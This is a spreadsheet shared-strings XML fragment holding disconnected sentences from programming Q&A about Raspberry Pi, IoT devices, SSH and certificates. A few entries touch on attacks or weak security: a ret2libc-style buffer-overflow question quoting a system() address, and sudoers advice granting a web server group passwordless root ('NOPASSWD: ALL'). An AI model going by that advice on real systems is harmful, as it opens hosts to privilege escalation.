all sensor info over all buildings  
just sensor info for building1 etc.</t>
  </si>
  <si>
    <t>With the raspberry pi people usually run as root (as you are) and if you want to install a binary package with root (maybe any package), you need to use the  flag with npm.</t>
  </si>
  <si>
    <t>To brief, you need to develop an Agent which accepts the Pairing request automatically, assuming "Confirmation" agent here.</t>
  </si>
  <si>
    <t>Unit tests should focus on verifying the behavior of your code and stubbing out the implementation details of any dependencies.</t>
  </si>
  <si>
    <t>However, many operating systems still apply the term to pointers to opaque, "private" data structuresopaque pointersor to indexes into internal arrays passed from one process to its client.</t>
  </si>
  <si>
    <t>This allows someone to blacklist packages that come from a specific repository, or blacklist all packages from a repository and only whitelist certain packages.</t>
  </si>
  <si>
    <t>If logRequests is true (the default), requests will be logged; setting this parameter to false will turn off logging.</t>
  </si>
  <si>
    <t>In order to protect you from running these commands against your production database, you will be prompted for confirmation before these commands are executed.</t>
  </si>
  <si>
    <t>If the alias is no longer valid, null will be returned on lookups using that value
An application can request the installation of private keys and certificates via the Intent provided by createInstallIntent().</t>
  </si>
  <si>
    <t>A private key consists of n and the private exponent d, which is generally almost as large as n. A private key may contain other fields to speed up computations.</t>
  </si>
  <si>
    <t>type safe) if the array is immutable; if insert and remove operators are permitted, then the insert operator is covariant (e.g.</t>
  </si>
  <si>
    <t>Passwords or Pass Phrases are a string that is used to help lockout people who do not know this string from using a persons account or computer.</t>
  </si>
  <si>
    <t>exit status 1
expected constructor, destructor, or type conversion before '(' token
"
If there is any more details I can provide or if anyone knows of a post on a similar issue please let me know.</t>
  </si>
  <si>
    <t>Similar result, different command :
*** an improvement (20190416)
Found this
PuTTY X11 proxy: Unsupported Authorisation Protocol
Now "X11 proxy ..." error is gone.</t>
  </si>
  <si>
    <t>The general form of the command would be:
of course, this presumes that you've been successful in setting up SSH so that you can log in using a command of the following form:
ssh &lt;user&gt;@&lt;ip-address&gt;
If you still need to make that work, have a look at the documentation for the ssh-copy-id command.</t>
  </si>
  <si>
    <t>Passing by value is more secure if the function can also be called by malicious code (malicious code can retain the reference and observe it later even if it cannot modify it).</t>
  </si>
  <si>
    <t>Apps can be used to add passes directly to the user's Passbook
In addition to App, Passes can also be added using Safari and the built-in Mail application as well.</t>
  </si>
  <si>
    <t>Try with the following compilation flag:
Do not emit the extra code to use the routines specified in the C++ ABI for thread-safe initialization of local statics.</t>
  </si>
  <si>
    <t>Instant Field Format Validation
We added an instant validation in fields for your customers account creation, email and more.</t>
  </si>
  <si>
    <t>Works fine like this:
But then i try to def my function for Tornado server:
Tornado:
class SecureOnHandler(tornado.web.RequestHandler):
    @gen.coroutine
    def get(self):
        result = RosPi.secure_on(prevSec, currSec)
        self.write({"info": result['info']})
After that i get an error 
"Camera component couldn't be enabled: Out of resources (other than memory)
  ERROR:tornado.access:500 GET /secure_on
What could be causing the error?</t>
  </si>
  <si>
    <t>Running each command separately works perfectly, but when executing the batch script, I get this error if I enter the correct password:
Here is my bash script: 
And here is my python script to run the server:
from bottle import *
import time
import math
login_page1 = '''
&lt;html&gt;
    &lt;head&gt;
        &lt;title&gt;
            Welcome!</t>
  </si>
  <si>
    <t>Ii know that it could successfully get the shell but there is something wrong with the argument that I've sent:
This is the address of system function: x54\xb1\xe9\xb6
And this is the vulnerable code that I'm using:
#include &lt;stdio .h&gt; 
#include &lt;string .h&gt; 
#include &lt;stdlib .h&gt;
void donuts() {
    puts ( Donuts .</t>
  </si>
  <si>
    <t>In the original ADAFruit library this time is calculated from the data rate (insecure) and in the recent port to CircuitPython this time will most often be around 0.01 s, because the conversion will most probably not have finished directly after configuration (check the _read method).</t>
  </si>
  <si>
    <t>But I am getting error "Invalid File Format"
I tried with following two options.</t>
  </si>
  <si>
    <t>There shouldn't be an error at that line, but  should definitely throw an error; this function is private.</t>
  </si>
  <si>
    <t>To connect to a hidden network yo need to modify only /etc/wpa_supplicant/wpa_supplicant.conf
I create this file and encrypted using  command
2.</t>
  </si>
  <si>
    <t>There are many motivations for wanting to rewrite Git history:
Fixing up an old commit
Reducing repository size by removing large files previously checked into the repo - they still take up disk space even if removed from later commits
Removing sensitive data (passwords, credentials, etc) which you wouldn't want to share when sharing the repo, or even just moving a repo to an external hosting provider
Re-arranging or removing entire folders to reflect the splitting up of many sub-projects from one repo to many, or vice-versa
Git repositories store the whole of project history, and by design Git commits are immutable (their id changes completely if even a small part of their content or history is changed) - so how can you remove unwanted data stored deep in your repositorys past?</t>
  </si>
  <si>
    <t>The JSONObject's getInt(String key) method gets the int value associated with a key from a JSON object.</t>
  </si>
  <si>
    <t>This result code is only a transitory state, which will pass as soon
  as your other thread's call to AUGraph (that has the lock) completes.</t>
  </si>
  <si>
    <t>Less critical hardware devices can be initialized when the associated device
driver is started, usually from within main.</t>
  </si>
  <si>
    <t>How to check if you have sudo enabled
run these following commands from terminal 
If you have sudo privileges the terimal should now say 
or something along those lines.</t>
  </si>
  <si>
    <t>Skuld is a command line tool to manage the user account status inside the FIWARE Lab keystone service.</t>
  </si>
  <si>
    <t>Null Safety - Application logic will proceed even if intermediate variables are undefined or null.</t>
  </si>
  <si>
    <t>For sudo, this means adding entries to sudoers to allow running a command without password, and without requiring a tty.</t>
  </si>
  <si>
    <t>I've tried converting the string password to hex and supplying it in hex as a string.</t>
  </si>
  <si>
    <t>What that means, is that in addition to creating the key pair like you have, you also need to register the public key with the certificate you've specified at the registry level.</t>
  </si>
  <si>
    <t>General Usage and API:
In EventBus, subscribers implement event handling methods and register themselves to the bus.</t>
  </si>
  <si>
    <t>If a search condition is entered along with a missing or invalid operator, ORA-00920 will be thrown.</t>
  </si>
  <si>
    <t>UPDATE: In order to preserve encapsulation, it is also better to declare your variables as private and apply access to them via setter and getter methods.</t>
  </si>
  <si>
    <t>If you don't want the connection to be non-blocking, you probably want to remove the O_NDELAY option you've added to your call to  that turns on non-blocking.</t>
  </si>
  <si>
    <t>Once you upload your packages and enable your Gemfury repository, you can securely deploy any package to any host.</t>
  </si>
  <si>
    <t>I viewed the code, then found the difference below for UserName at the 128 line and set up all properties in the function updateConnectionOptions at the 346 line.</t>
  </si>
  <si>
    <t>Proof General is a generic front-end for proof assistants (like Coq or Isabelle), based on the customizable text editor Emacs.</t>
  </si>
  <si>
    <t>From what I've read, to decrypt the cipher text on the Arduino from
Android I will need to send, the cipher text, the IV, and the PBE
iteration count.</t>
  </si>
  <si>
    <t>Main application is some kind of server, so it won't exit gently in most times, so I need some kind of additional protection and this should be not Linux unique method.</t>
  </si>
  <si>
    <t>Started Node-RED graphical event wiring tool..
  13 Aug 18:10:15 - [info]
  Welcome to Node-RED
This is my blumix credentials.</t>
  </si>
  <si>
    <t>in order to run some root privileged command in website, you need to put www-data in your /etc/sudoers to allow the www-data to run as root for the command, here is the line you need in /etc/sudoers:</t>
  </si>
  <si>
    <t>On the other hand, if you really need to open a program at boot with root privileges, you should look into using the file /etc/rc.local or the cron service for that.</t>
  </si>
  <si>
    <t>KNX defines several physical communication medias:
Twisted pair wiring (inherited from the BatiBUS and EIB Instabus standards)
Powerline networking (inherited from EIB and EHS - similar to that used by X10)
Radio (KNX-RF)
Infrared
Ethernet (also known as EIBnet/IP or KNXnet/IP)</t>
  </si>
  <si>
    <t>Note that in this simple example, the copy constructor and assignment operator were both declared private, giving us a class that can not be copied.</t>
  </si>
  <si>
    <t>X.509 specifies, amongst other things, standard formats for public key certificates, certificate revocation lists, attribute certificates, and a certification path validation algorithm.</t>
  </si>
  <si>
    <t>If you want to securely browse the website using HTTPS, you need to use the function begin(String url, String httpsFingerprint) (link).</t>
  </si>
  <si>
    <t>When one installs (or upgrades) any single package or a group of packages, debconf asks the packages' configuration questions all at once, and stores the user/admin preferences in a database.</t>
  </si>
  <si>
    <t>I noticed this error disappears when running the command as superuser (with sudo), so it seems to be a permissions issue, but I don't really understand why the /etc/init.d/mpd script is not capable of detecting the process being run... it's always called with sudo, so it should not have permission issues, shouldn't?</t>
  </si>
  <si>
    <t>(0x80004005) 
Error DEP8000: Unexpected deployment failure : RemoteCommandException : Windows cannot register package
  c820041a-da82-4e55-b136-83591b83e844 because it is in development mode
  and the package is already installed.</t>
  </si>
  <si>
    <t>When I make the API call to get device info for gateway type of device, it gives me the information but same type of call for Iot-Bridge type device says NotFound.</t>
  </si>
  <si>
    <t>On installing Google Assistant SDK guide cant get through this command:
python -m pip install --upgrade google-auth-oauthlib[tool]
  It returns
I'm in virtualenv --no-site-packages.</t>
  </si>
  <si>
    <t>[bluetooth]# info 34:15:13:87:98:37
Device 34:15:13:87:98:37 (public)
        Name: DSDTECH HM-10
        Alias: DSDTECH HM-10
        Paired: no
        Trusted: yes
        Blocked: no
        Connected: no
        LegacyPairing: no
        UUID: Unknown                   (0000ffe0-0000-1000-8000-00805f9b34fb)
        ManufacturerData Key: 0x4d48
        ManufacturerData Value:
  34 15 13 87 98 37                                4....7
        ServiceData Key: 0000b000-0000-1000-8000-00805f9b34fb
        ServiceData Value:
  00 00 00 00                                      ....
        RSSI: -56
        TxPower: 0
When I use a different nano/HM-10 combo, this value is a different gibberish of @|...x , both for the info/manufacturing data and for the read of uuid ffe1.</t>
  </si>
  <si>
    <t>The hardware has been verified ; 
The i2c lines has been probed in order to verify if pull-up "hold the line too hard" and I do get nice square signal.</t>
  </si>
  <si>
    <t>How do I get a caller identity from sim900 using pic16f877A microcontroller meanwhile, I can make call, send SMS and answer calls but I want to be able to compare an incoming call identity with a predefined on in my program.</t>
  </si>
  <si>
    <t>Should become
Encoded String: from=user%40mail.com&amp;to=user%40mail.com&amp;text=Test%20message%20post%20%2B%20anoher&amp;subject=Alarm%21%21%21
Thanks!</t>
  </si>
  <si>
    <t>currently, I am parsing the text SMS for payment confirmation but it is taking too much time so can you please tell me any alternative or can I set callback URL of paytm, if yes then how.</t>
  </si>
  <si>
    <t>I found a solution for the problem:
the line above has to be commented out and you have to delete your lock files for a "fresh" USB connection!</t>
  </si>
  <si>
    <t>also, whenever you change a setting in gitlab.yml make sure you run 
sudo service gitlab restart
and 
sudo -u git -H bundle exec rake gitlab:env:info RAILS_ENV=production
so that your changes are verified.</t>
  </si>
  <si>
    <t>To solve this I simply uncommented the integer to string line
and made const char *password = spassword; to const char *password = spassword.c_str(); as Bence Kaulics answered in the comment under my post, which works flawlessly.</t>
  </si>
  <si>
    <t>In general, you do not need to call unsubscribe on http-calls in angular, as is described here:
Do you need to unsubscribe from Angular 2 http calls to prevent memory leak?</t>
  </si>
  <si>
    <t>I have managed to hack this by altering the code on line 642 of /usr/lib/python2.7/test/test_support.py to a hard coded string character.encode('UTF-8').decode('UTF-8')
Although I now have this working, it would be nice to have a proper solution if anyone has one?</t>
  </si>
  <si>
    <t>It was not really async-safe code (someone probably wasn't aware of synchronization context) and it worked on Win 10 only because on desktop it was looking for COM0 device and I only have COM2, so method causing trouble was not even invoked at all.</t>
  </si>
  <si>
    <t>Strong references are regular references that are protected from garbage collection, in contrast to weak references.</t>
  </si>
  <si>
    <t>Even if you remove the obvious limitation that no C program with identifiers whose name equals one of the new keywords in C++ (such as new, delete, class ...) it would still not be true.</t>
  </si>
  <si>
    <t>The problem is that when my hsql server starts, it tells that the alias exists, everything connected successfully:
But when I try to connect with my java app I receive this error:
-on server:
-on client: 
Caused by: org.hsqldb.HsqlException: General error: database alias does not exist
at org.hsqldb.error.Error.error(Unknown Source)
at org.hsqldb.ClientConnection.&lt;init&gt;(Unknown Source)
... 16 more
I have tried to test the connection with the sqltool, but still the same.</t>
  </si>
  <si>
    <t>The POST contains a test string (trying to roughly gauge simple data integrity, make sure the string comes through uncorrupted) as well as the number of the loop that is being sent (e.g.</t>
  </si>
  <si>
    <t>When using the RegisterThing method and sending a CSR in the parameters argument, the certificate gets created fine and attached to the thing fine and everything with the certificate looks good.</t>
  </si>
  <si>
    <t>Quick fix:
Detailed fix:
Most likely you would need to set up Async keys (public/Private) for proper passwordless login.</t>
  </si>
  <si>
    <t>In particular, the user consent prompts run on the device that the band is paired with and in this case the required APIs for user prompts are not supported in the Windows 10 IoT Core APIs.</t>
  </si>
  <si>
    <t>Updated to include Marks suggestion in the comment below
To shorten this into a single command eg: killit, the following line should be placed into ~/.bashrc
alias killit='sudo pkill -f /home/pi/mystepper.py'
Note: The above works without password auth on a Raspberry Pi because the default Raspbian /etc/suoders file disables password challenge when using sudo as the pi user.</t>
  </si>
  <si>
    <t>One way would be to boot into the terminal is to log in with root credentials and enter the following command:
This is instead of starting the X server
Otherwise, if you have reached desktop , switch to console by Ctl + Alt + F1 This will resize the screen into a usable size .</t>
  </si>
  <si>
    <t>I have replaced the header config with the config for my account.</t>
  </si>
  <si>
    <t>Script working from command line when i log in by ssh.</t>
  </si>
  <si>
    <t>You may want the RFDuino to hold the private key.</t>
  </si>
  <si>
    <t>Or hack it to not run an exception however requestWait will most likely return null.</t>
  </si>
  <si>
    <t>This package contains both libcrypto.so.1.0.0 and libssl.so.1.0.0.</t>
  </si>
  <si>
    <t>In your code you attempt to initialize it again in the checkPassword method, and that is obviously not going to work.</t>
  </si>
  <si>
    <t>Pair with 4321 as your pin, and connect to the local network.</t>
  </si>
  <si>
    <t xml:space="preserve">
This line should remove the certificate.</t>
  </si>
  <si>
    <t>( StringTokenizer can also be used to parse a string).</t>
  </si>
  <si>
    <t>More about private modules here.</t>
  </si>
  <si>
    <t>It also provides for private packages, i.e.</t>
  </si>
  <si>
    <t>the reason I ask is that, between the shared access key and the word "GatewayHostName", you have an equals sign and not a semi-colon..
it should be:
HostName={IoTHubName}.azure-devices.net;DeviceId=TC51_EdgeDownStreamDevice01;SharedAccessKey={My-Shared-Access-Key};GatewayHostName={my-gateway-machine-name-dns-name}.centralus.cloudapp.azure.com
(note the ';' before GatewayHostName   if you really did have an equals sign there instead of a semicolon, there's no telling what kind of chaos that would cause :-)
Secondly, in your route, you call your module BatteryDataFunctionModule..  just want to make sure that module name is exact, including being case-sensitive.</t>
  </si>
  <si>
    <t>I (eventually) got a security policy server set up, using an Apache mod (designed for just this scenario)
And when I run this line:
I get the policy reference returned to me:
I have even gotten my custom one to load (which is really just the same config, but wanted to see if the 'master' file was allowing for custom policies, and it was/is)
Maybe the fault is on the Flash/AS side of things?</t>
  </si>
  <si>
    <t>Thus you should remove the line gsm.begin(9600) from the checkPassword function.</t>
  </si>
  <si>
    <t>The SSH private key will need to be on each rpi, and the corresponding public key will need to be added to the Bitbucket repo(s).</t>
  </si>
  <si>
    <t>For example, the command  will automatically create a key with the string value "1" if the key does not exist.</t>
  </si>
  <si>
    <t>This included:
-Pip install RPi.GPIO in the env/bin/activate source
-Importing that library into the sample code from google
-Accessing credentials for firebase from the program
After doing those things I rebooted the pi as I start assistent at launch with this .sh
It shows this expected result but ignores prompts
I reverted the code and installs but that did not fix it.</t>
  </si>
  <si>
    <t>I have installed Mosquitto 1.4.10 on a Raspberry PI 3 model B.
I have created a password file using the command : sudo mosquitto_passwd -c /etc/mosquitto/passwd test and set the password to "test".</t>
  </si>
  <si>
    <t>In this case I was able to install the agent on the device, but after starting it, it initialized forever.</t>
  </si>
  <si>
    <t>JASPIC is an SPI for creating portable server authentication modules (aka SAMs or login modules).</t>
  </si>
  <si>
    <t>How can I create a "stealth" class which could be passed to the  method, while still addressing any of the two different objects underneath?</t>
  </si>
  <si>
    <t>I've commented out the user "pi" while acting as root after typing the following: 
  nano etc/passwd
Saved and exited.</t>
  </si>
  <si>
    <t>The public key used for SSH login is written in ~/.ssh/authorized_keys
I already tried making new key pairs with ssh-keygen and adding the new public key as a Bitbucket Deployment key.</t>
  </si>
  <si>
    <t>On one hand BR also has ct-ng backend, on the other hand you can create a complete root file system with it.</t>
  </si>
  <si>
    <t>You can get the path like this:
And access these files like this:
For more information you can reference "File access permissions" and "Create, write, and read a file".</t>
  </si>
  <si>
    <t>And you will get a StoreKey.pfx certificate which has the same publisher info as your manifest and will be used for code signing when you create package.</t>
  </si>
  <si>
    <t>The identity operator applies strict comparison on the operands, without doing a type conversion.</t>
  </si>
  <si>
    <t>I also added a public wide open api key to my project and tried that (instead of the private one).</t>
  </si>
  <si>
    <t>Problem: this creates many more private methods, however this is okay according to the question linked.</t>
  </si>
  <si>
    <t>There were problems registering Agent on BlueZ 5.43 via pexpect, had to upgrade to 5.50
Alternative command (note it will not return a response):
    pi@raspberrypi:~ $ sudo hciconfig hci0 name 'New device name'</t>
  </si>
  <si>
    <t>The public/private key pair associated with the certificate is only valid within this date range.</t>
  </si>
  <si>
    <t>The Twofish cipher has not been patented and the reference implementation has been placed in the public domain.</t>
  </si>
  <si>
    <t>I have added another field (beyond the ssid\password fileds):
I want on submit to create a lua file (result1.lua) with the Get result of this field.</t>
  </si>
  <si>
    <t>Does polling two Nests with the same authenticated call result in multiple requests, as it relates to their data limiting?</t>
  </si>
  <si>
    <t>adding the  option to the command line when installing
or, validate the key downloading the key itself from https://packagecloud.io/headmelted/codebuilds/gpgkey and then using: apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys [key], where [key] is the file that you downloaded.</t>
  </si>
  <si>
    <t>In order to log in securely to a remote system via a secure shell, a private key/public key pair is generated.</t>
  </si>
  <si>
    <t>See using in demo
Parameters supported by this object:
url - URL of File Uploader's route authToken
Auth token that will    be applied as 'Authorization' header during file send.</t>
  </si>
  <si>
    <t>But that is a really bad idea, probably won't work because arduino does not support HTTPS (SSL/TSL) because it has not enought resource, and leaving full DB access unprotected is really a bad idea.</t>
  </si>
  <si>
    <t>Then please check your iot hub connection string used in device client to confirm that the shared access polity used with connection string have all the privileges or not, that is needed at your end.</t>
  </si>
  <si>
    <t>git config will record your settings in your global config ()
But sudo git ... will look for configs in /root/.gitconfig
But in your case, it is best to init, add and push as your account instead of root.</t>
  </si>
  <si>
    <t>Please refer to this post on the Node-RED forum: https://discourse.nodered.org/t/malware-infecting-unsecured-node-red-servers/3460
This comes as a result of exposing Node-RED to the internet without applying any security.</t>
  </si>
  <si>
    <t>$foo) which are not inside double quotes or in a few other protected locations are split into multiple fields based on the value of IFS; the same goes for command substitutions (e.g.</t>
  </si>
  <si>
    <t>Using MODE_STATIC mode, if it does not correctly initialize, the state will be: STATE_UNINITIALIZED,
instead, if correctly initialized: STATE_NO_STATIC_DATA, when you invoke write method the state will be changed to STATE_INITIALIZED.</t>
  </si>
  <si>
    <t>For instance:
#define PORT_B_MASK = 0x3F;
#define PORT_C_MASK = 0x0F;
#define PORT_D_MASK = 0xFC;
void apply_configuration(uint8_t index)
{
    write_with_mask(&amp;PORTC,PORT_C_MASK,allvalues[index][0]);
    write_with_mask(&amp;PORTB,PORT_B_MASK,allvalues[index][1]);
    write_with_mask(&amp;PORTD,PORT_D_MASK,allvalues[index][2]);
}
This way I excluded pins 0 and 1 (serial interface) and pins A4 and A5 (I2C interface).</t>
  </si>
  <si>
    <t>Identify which users and accounts called AWS APIs for services that support CloudTrail, the source IP address the calls were made from, and when the calls occurred.</t>
  </si>
  <si>
    <t>Simple push messages consist of 140 characters of message text and may include an optional data string and user key string.</t>
  </si>
  <si>
    <t>Here are a few code examples...
Login using Facebook:
Get the user's list of friends:
Post on the user's feed:
openFB.api(
    {
        method: 'POST',
        path: '/me/feed',
        params: {
            message: 'Testing the Facebook Graph API'
        },
        success: successHandler,
        error: errorHandler
    });
Source: GitHub (OpenFB)</t>
  </si>
  <si>
    <t>quanteda includes tools to make it easy and fast to manuipulate the texts in a corpus, for instance by tokenizing them, with or without stopwords or stemming, or to segment them by sentence or paragraph units.</t>
  </si>
  <si>
    <t>Resources
AWS Security Token Service API Reference
AWS Security Token Service CLI Reference
Controlling Permissions for Temporary Security Credentials section of IAM User Guide.</t>
  </si>
  <si>
    <t>You must have at a minimum enabled INFO level logging on your project in IoT Core &gt; Registries &gt; [your registry] &gt; Edit Registry &gt; Select "Info" log level &gt; Click save.</t>
  </si>
  <si>
    <t>If you have the latest snapshot backed up, you can:
Reinstall and start Kura
Open the Kura Web UI and navigate to Settings -&gt; Snapshots
Use the 'Upload and Apply' button to upload your backed up file
Note: The snapshot files are encrypted on disk, to view them in plain text you must use the Kura Web UI to download the file.</t>
  </si>
  <si>
    <t>(This is especially true for cascading permissions in data dependencies.)</t>
  </si>
  <si>
    <t>1 locks A and B
2 locks C
2 needs A to finish
1 needs C to finish.</t>
  </si>
  <si>
    <t>I've verified all return values and arguments along the way.</t>
  </si>
  <si>
    <t>I don't even know if the private URL key is a calendar ID or what.</t>
  </si>
  <si>
    <t>I have multiple ESP8266 modules that I'm using for my home security system.</t>
  </si>
  <si>
    <t>but cannot split the string
StringTokenizer tokens = new StringTokenizer(emissorInput, "\\.</t>
  </si>
  <si>
    <t>The same issue appeared when I tried to connect with an invalid certificate or private key.</t>
  </si>
  <si>
    <t>But when I tried to check the command line and use adb devices, the adb does not detect any device.</t>
  </si>
  <si>
    <t>Also to work with sensor is permission requiered that could be granded only in command line.</t>
  </si>
  <si>
    <t>ls -l outputs:
-rw-r--r--  1 user  staff    0 Feb  4 12:26 fifo264 note the missing p from the permission string.</t>
  </si>
  <si>
    <t>Destructor is being invoked but another call to LockBuffer() raises the same error as before.</t>
  </si>
  <si>
    <t>I have windows app which will call this webapi to enroll+register the device in one call.</t>
  </si>
  <si>
    <t>But for me , I have the certificate in my local machine along with the private key.</t>
  </si>
  <si>
    <t>Is it possible to boot raspberrypi 3B+ by using fingerprint?</t>
  </si>
  <si>
    <t>I have some problem with parsing authentification string from JSON string.</t>
  </si>
  <si>
    <t>return vo;
            }
        }
        return 0;
    }
How can this be done in a better or more transparent way?</t>
  </si>
  <si>
    <t>You will first need to remove the module gpio_keys from kernel.</t>
  </si>
  <si>
    <t>What you are trying to do is not allowed, because the moment the  exits the data becomes invalid.</t>
  </si>
  <si>
    <t>If you are still using RXTX lib, there can be "permission" issue for getPortIdentifier returning empty.</t>
  </si>
  <si>
    <t>Thus this will allow you not putting credentials into a lua file.</t>
  </si>
  <si>
    <t>Or you can access them from your local network by known static IP addresses.</t>
  </si>
  <si>
    <t>Spoof the User-Agent string.</t>
  </si>
  <si>
    <t>You should replace all references to wiring.h with wiring_private.h.</t>
  </si>
  <si>
    <t>And now it includes the geo-fencing alert for exit and entry too.</t>
  </si>
  <si>
    <t>Relative paths are more likely to be unsafe.</t>
  </si>
  <si>
    <t>You could also try to "hack" into picamera using the "private" methods.</t>
  </si>
  <si>
    <t>Then generate CA's certificate using the config file, rootCA_openssl.conf.</t>
  </si>
  <si>
    <t>You should not initialize the capability as "NoInputOutput" for fixed key pairing.</t>
  </si>
  <si>
    <t>So I suggest you to reinitialize the siaudioTrack at the very begginning of run() method using this line.</t>
  </si>
  <si>
    <t>The private key must never be divulged while the public key can be made available to everyone.</t>
  </si>
  <si>
    <t>The second file referenced by the JDK is the keystore that contains the application's personal certificate and private keys, if any.</t>
  </si>
  <si>
    <t>The app developer holds the certificate's private key.</t>
  </si>
  <si>
    <t>It is available to any Lua application once it has been
  properly initialized by the interpreter in use.</t>
  </si>
  <si>
    <t>For example, any user can access /foo without being prompted to authenticate.</t>
  </si>
  <si>
    <t>To register a new package:
The package name must adhere to the bower.json spec.</t>
  </si>
  <si>
    <t>I've also tried uploading the code to my Node MCU, in which case, I got a different error:
esptools.FatalError: Invalid head of package (0x46)</t>
  </si>
  <si>
    <t>AVRdude emits a line like this:
which identifies the device, i.e.</t>
  </si>
  <si>
    <t>If so, take a look to the authSource option you can add to your connection string.</t>
  </si>
  <si>
    <t>For adding a user, for example:
Check the user added:
Use the newly added user "rita" to login:</t>
  </si>
  <si>
    <t>I can find my End-Device module and not other nearby ZigBee modules that don't match with my private profile ID.</t>
  </si>
  <si>
    <t>I'm on the final bits of my app, and I came across with TPM (Trusted Platform Module).</t>
  </si>
  <si>
    <t>So you need to move your calls in the main() function, for example, so that the code gets valid.</t>
  </si>
  <si>
    <t>In the BOOT drive, create a file called "ssh" with no extension.</t>
  </si>
  <si>
    <t>I want to create a ssh or Windows desktop connection into the Pi from my laptop, which is connected to the home router.</t>
  </si>
  <si>
    <t>The connection use ssl encryption, so I am using the following command type:
Unfortunately, I get :
And then nothing appends.</t>
  </si>
  <si>
    <t>In order to avoid the IllegalStateException:
After created an instance of AudioTrack you have to test if it is well initialized.</t>
  </si>
  <si>
    <t>You can reference "Encrypting Data with CNG" and "Typical CNG Programming" for desktop and create your own C++ UWP application.</t>
  </si>
  <si>
    <t>I then add it as sudoer without a password (mostly to be able to sometimes run package management commands and try a few things).</t>
  </si>
  <si>
    <t>The format is (after adminschoice.com):
So, in your case, the file should look like:
0 * * * * /path/to/your/script
Note the runtime permissions will be as the user that edited the crontab.</t>
  </si>
  <si>
    <t>Set the button route to be /authentication/authenticate/fakefacebook
Now we grab the library -&gt; install-package SimpleAuthentication.Mvc
Create a class which will be called -after- we come back from Facebook (or any provider).</t>
  </si>
  <si>
    <t>Private queue (NSPrivateQueueConcurrencyType)
The context creates and manages a private queue.</t>
  </si>
  <si>
    <t>If the private key is compromised - which is possible, if you're distributing it everywhere - then the potential damage will depend on where you've put the public key.</t>
  </si>
  <si>
    <t>We can't have a screen on the device to comply with local regulations that is why, I require the adb to start at boot or during account automatic login.</t>
  </si>
  <si>
    <t>connectOptions.setUserName("unused");
        System.out.println(options.algorithm);
        if (options.algorithm.equals("RS256")) {
            connectOptions.setPassword(
                    createJwtRsa(options.projectId, options.privateKeyFile).toCharArray());
        }else {
            throw new IllegalArgumentException(
                    "Invalid algorithm " + options.algorithm + ".</t>
  </si>
  <si>
    <t>If you are the Service Prover then edit the Shell Access Rights to executed Exec command in PHP configuration file.</t>
  </si>
  <si>
    <t>The easiest would be to SSH to your pi and use the command line to create one, or alternatively you can use mySQL workbench from your pc assuming you started the daemon on your pi.</t>
  </si>
  <si>
    <t>For example, you can add the remote user to uhttpd group(remotely):
then list commands allowed to run without password
%uhttpd ALL=(ALL) NOPASSWD: ALL
We allowed ALL commands for simplicity.</t>
  </si>
  <si>
    <t>If you want users to be able to register their own devices with your IoT hub, you should create a separate service that can be called from the device and that returns a key.</t>
  </si>
  <si>
    <t>Information on ensuring the SPI is enabled is here :
http://www.raspberrypi-spy.co.uk/2014/08/enabling-the-spi-interface-on-the-raspberry-pi/
Would have added this in a comment as I am not 100% on this but I don't have the rep for that.</t>
  </si>
  <si>
    <t>Note #2: hciconfig hci0 can't be set with auth or encrypt those will actually register agent DisplayOnly (we will be creating agent in next step) as KeyboardDisplay (sudo btmon to verify) and pairing won't use predefined PIN.</t>
  </si>
  <si>
    <t>So, in the main loop there's if statement:
After adding this "if condition" Arduino sometimes recognize trusted number after 1'st call, and sometimes after 4'th or 5'th.</t>
  </si>
  <si>
    <t>Doing "ls -ld /dev/ttyACM0" shows the following permissions for the modem:
"lsusb" tells me:
"udevadm info --attribute-walk --name=ttyACM0" says:
Udevadm info starts with the device specified by the devpath and then
walks up the chain of parent devices.</t>
  </si>
  <si>
    <t>The server I am calling is returning 400 bad request, but it does not echo back to me the actual HTTP request so that I can see what is malformed.</t>
  </si>
  <si>
    <t>If the date, time, or datetime value extracted from str is illegal, STR_TO_DATE() returns NULL and produces a warning.</t>
  </si>
  <si>
    <t>The public key is placed on all computers that must allow access to the owner of the matching private key (the owner keeps the private key secret).</t>
  </si>
  <si>
    <t>Therefore the config for the accespoint based solution would be like 
/etc/network/interfaces
(which is by the way pretty much like yours already)
and then the /etc/wpa_supplicant/wpa_supplicant.conf which connects to a WPA2 accesspoint
Please note that the psk key needs to be generated by 
$wpa_passphrase "KBBL" "YOUR_KEY"
which results in something like
network={
        ssid="KBBL"
        #psk="YOUR_KEY"
        psk=29af596e046ad450eeddd6752432d5dbd26575960b9024e5cbb99e945cdafa4e
}
just copy and paste the psk
Then reboot!</t>
  </si>
  <si>
    <t>There's some documentation on WiFi.persistent() here - which appears to be incorrect - I believe this call operates the way I described (passing false just doesn't store the credentials at all).</t>
  </si>
  <si>
    <t>Difference between public, protected, private and default
Arithmetic and conversions:
Why can't I print a double correctly?</t>
  </si>
  <si>
    <t>I'm trying to set up a practical DIY method of unlocking a garage or front door by coming into the range of a reader; even if that means standing in a specific line of sight.</t>
  </si>
  <si>
    <t>However when i ssh into my raspberry 3B+ and run
sudo docker pull somehostname/hello
sudo docker run -p 4000:80 somehostname/hello
i get:
standard_init_linux.go:207: exec user process caused "exec format error"
I read about this error and it seems to be a problem with the architecture difference: my windows mashine is using x86-64 while the raspberry 3B+ is using ARM.</t>
  </si>
  <si>
    <t>It turned out that he was not running his compiled object file through the linker, with the result that some essential library was missing which caused the PIC to loop endlessly, trying to execute an invalid opcode (instruction).</t>
  </si>
  <si>
    <t>Add conditional logic, invoke JavaScript and desktop commands, handle dialogs, perform image verifications and more, WITHOUT a single line of code.</t>
  </si>
  <si>
    <t>ORA-01722: invalid number 
Cause:
The attempted conversion of a character string to a number in Oracle failed because the character string was not a valid numeric literal.</t>
  </si>
  <si>
    <t>(lt-test-launch:4650): GLib-GObject-CRITICAL **: g_object_ref: assertion 'G_IS_OBJECT (object)' failed
** (lt-test-launch:4650): CRITICAL **: gst_rtsp_media_factory_get_auth: assertion 'GST_IS_RTSP_MEDIA_FACTORY (factory)' failed
I'm just trying to change tcpserversink method to udpsink method.</t>
  </si>
  <si>
    <t>* &lt;p&gt;
 * Instead of hard-coding a username/password in settings and passing 
 * it on each AJAX request, this method is called whenever a request 
 * is challenged for credentials.</t>
  </si>
  <si>
    <t>Mapping method calls from C# to stored procedure calls in the database provides an extra layer of type safety as well, for protection against SQL Injection attacks.</t>
  </si>
  <si>
    <t>In a client, catch FaultException objects to handle unknown or generic faults, such as those returned by a service with the IncludeExceptionDetailInFaults property set to true.</t>
  </si>
  <si>
    <t>Its approach to managing encapsulation is much simpler than conventional Java, eschewing the standard public/private/protected designations in favor of a "shared" annotation that is used to signify methods or values that can be accessed externally.</t>
  </si>
  <si>
